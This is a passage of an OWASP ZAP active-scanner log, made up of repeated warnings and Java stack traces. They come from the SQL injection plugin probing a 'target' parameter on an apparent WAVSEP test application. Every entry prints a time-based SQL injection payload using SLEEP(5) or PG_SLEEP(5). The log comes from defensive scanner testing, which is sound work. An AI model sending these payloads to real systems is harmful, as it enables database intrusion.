org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681672 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;(SELECT * FROM (SELECT(SLEEP(5)))HrNC)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;(SELECT * FROM (SELECT(SLEEP(5)))HrNC)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681673 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))JWLf)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))JWLf)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681674 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com');(SELECT * FROM (SELECT(SLEEP(5)))NsIG)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com');(SELECT * FROM (SELECT(SLEEP(5)))NsIG)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681675 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))QdNL)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))QdNL)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681675 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com';(SELECT * FROM (SELECT(SLEEP(5)))cXiH)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com';(SELECT * FROM (SELECT(SLEEP(5)))cXiH)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681676 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))Dvkr)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))Dvkr)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681677 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%';(SELECT * FROM (SELECT(SLEEP(5)))BkIU)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%';(SELECT * FROM (SELECT(SLEEP(5)))BkIU)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681677 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))JNpz)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))JNpz)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681678 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;(SELECT * FROM (SELECT(SLEEP(5)))WHng)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;(SELECT * FROM (SELECT(SLEEP(5)))WHng)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681679 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681679 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))YLer)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))YLer)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681681 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681681 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681682 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681682 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 